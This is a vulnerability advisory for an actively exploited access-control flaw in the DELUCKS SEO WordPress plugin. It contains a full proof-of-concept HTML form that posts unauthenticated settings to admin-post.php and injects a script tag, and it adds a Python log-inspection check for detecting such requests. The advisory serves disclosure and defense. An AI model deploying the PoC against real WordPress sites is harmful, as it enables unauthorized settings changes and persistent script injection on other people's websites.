Risk | High |
Patch available | NO |
Number of vulnerabilities | 1 |
CVE-ID | N/A |
CWE-ID | CWE-284 |
Exploitation vector | Network |
Public exploit | This vulnerability is being exploited in the wild. |
Vulnerable software | DELUCKS SEO (Web applications / Modules and components for CMS) |
Vendor | DELUCKS GmbH |
Security Bulletin
This security bulletin contains one high risk vulnerability.
EUVDB-ID: #VU21333
Risk: High
CVSSv3.1: 7.2 [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N/E:H/RL:U/RC:C]
CVE-ID: N/A
CWE-ID:
CWE-284 - Improper Access Control
Exploit availability: No
Description
The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.
The vulnerability exists due to improper access restrictions in the "saveSettings()" function when processing data passed to the "/wp-admin/admin-post.php" URL. A remote non-authenticated attacker can bypass implemented security restrictions and execute arbitrary JavaScript code on the website.
Note: this vulnerability is being actively exploited in the wild.
PoC:
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php" method="POST">
  <input type="hidden" name="dpc_save_settings" />
  <input type="hidden" name="dpc[basic_metadata][dpc_status_basic_metadata]" value="1" />
  <input type="hidden" name="dpc[basic_metadata][en][title][frontpage]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][title][delimiter]" value="-" />
  <input type="hidden" name="dpc[basic_metadata][en][title][website]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][desc]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][frontpage]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][delimiter]" value="-" />
  <input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][website]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][frontpage]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][delimiter]" value="-" />
  <input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][website]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][profiles][title][frontpage]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][profiles][title][delimiter]" value="-" />
  <input type="hidden" name="dpc[basic_metadata][en][profiles][title][website]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][archives][title][frontpage]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][archives][title][delimiter]" value="-" />
  <input type="hidden" name="dpc[basic_metadata][en][archives][title][website]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][tags][title][frontpage]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][tags][title][delimiter]" value="-" />
  <input type="hidden" name="dpc[basic_metadata][en][tags][title][website]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][searchresults][title][frontpage]" value="" />
  <input type="hidden" name="dpc[basic_metadata][en][searchresults][title][delimiter]" value="-" />
  <input type="hidden" name="dpc[basic_metadata][en][searchresults][title][website]" value="" />
  <input type="hidden" name="dpc[basic_metadata][verify][google]" value='"><script>alert("XSS");</script>' />
  <input type="hidden" name="dpc[basic_metadata][verify][bing]" value="" />
  <input type="hidden" name="dpc[basic_metadata][verify][yandex]" value="" />
  <input type="hidden" name="dpc[basic_metadata][verify][baidu]" value="" />
  <input type="hidden" name="dpc[basic_metadata][verify][pinterest]" value="" />
  <input type="hidden" name="dpc[basic_metadata][verify][alexa]" value="" />
  <input type="hidden" name="dpc[basic_metadata][follow_texonomies]" value="follow" />
  <input type="hidden" name="dpc[basic_metadata][index_texonomies]" value="index" />
  <input type="hidden" name="dpc[basic_metadata][follow_paginated]" value="follow" />
  <input type="hidden" name="dpc[basic_metadata][index_paginated]" value="index" />
  <input type="hidden" name="dpc[basic_metadata][categories][1][follow]" value="follow" />
  <input type="hidden" name="dpc[basic_metadata][categories][1][index]" value="index" />
  <input type="hidden" name="dpc[basic_metadata][profiles][follow]" value="follow" />
  <input type="hidden" name="dpc[basic_metadata][profiles][index]" value="index" />
  <input type="hidden" name="dpc[basic_metadata][attachments][follow]" value="follow" />
  <input type="hidden" name="dpc[basic_metadata][attachments][index]" value="index" />
  <input type="submit" value="Submit" />
</form>
</body>
</html>
Mitigation
Cybersecurity Help is currently unaware of any official solution to address this vulnerability.
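Added example (not part of the original bulletin and not the plugin's code): a Python check for captured HTTP requests, for instance from a WAF or reverse-proxy audit log, that flags writes to the settings handler described above. The request tuple layout, the host wp.example and the sample values are constructed for illustration; the absence of a wordpress_logged_in_ cookie is used only as a heuristic for an unauthenticated sender.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

TARGET_PATH = "/wp-admin/admin-post.php"   # URL named in the bulletin
TRIGGER_FIELD = "dpc_save_settings"        # field that triggers the settings write
# Characters needed to break out of an HTML attribute or to open a tag.
MARKUP = re.compile(r"[<>\"']")


def inspect_request(method, url, cookie_header, body):
    """Return a list of findings for one captured request (empty list = clean)."""
    path = urlsplit(url).path
    # endswith() also covers WordPress installed in a subdirectory.
    if method.upper() != "POST" or not path.endswith(TARGET_PATH):
        return []
    fields = parse_qsl(body, keep_blank_values=True)
    if TRIGGER_FIELD not in {name for name, _ in fields}:
        return []
    findings = []
    # No WordPress session cookie at all: the sender cannot be a logged-in admin.
    # (A cookie being present does not prove it is valid.)
    if "wordpress_logged_in_" not in (cookie_header or ""):
        findings.append("unauthenticated settings write")
    for name, value in fields:
        if name.startswith("dpc[") and MARKUP.search(value):
            findings.append(f"markup in {name}")
    return findings


# Constructed sample requests: (method, url, Cookie header, form-encoded body).
URL = "http://wp.example/blog/wp-admin/admin-post.php"
SAMPLES = [
    ("POST", URL, "", urlencode({
        "dpc_save_settings": "",
        "dpc[basic_metadata][verify][google]": '"><i>constructed-marker</i>'})),
    ("POST", URL, "wordpress_logged_in_0123=constructed", urlencode({
        "dpc_save_settings": "",
        "dpc[basic_metadata][en][title][delimiter]": "-",
        "dpc[basic_metadata][verify][google]": "abc123token"})),
    ("POST", URL, "", urlencode({"action": "unrelated_form"})),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[1], inspect_request(*sample) or "clean")
```

A hit on the first finding alone is worth following up by reviewing the plugin's stored settings, since the handler accepts the write regardless of what the values contain.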
Vulnerable software versions
DELUCKS SEO: 2.0.7 - 2.1.7
External links
http://blog.nintechnet.com/vulnerability-in-the-wordpress-delucks-seo-plugin-actively-exploited/
http://www.pluginvulnerabilities.com/2019/09/21/hackers-may-already-be-targeting-this-persistent-xs...
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.
Is there known malware that exploits this vulnerability?
Yes. This vulnerability is being exploited in the wild.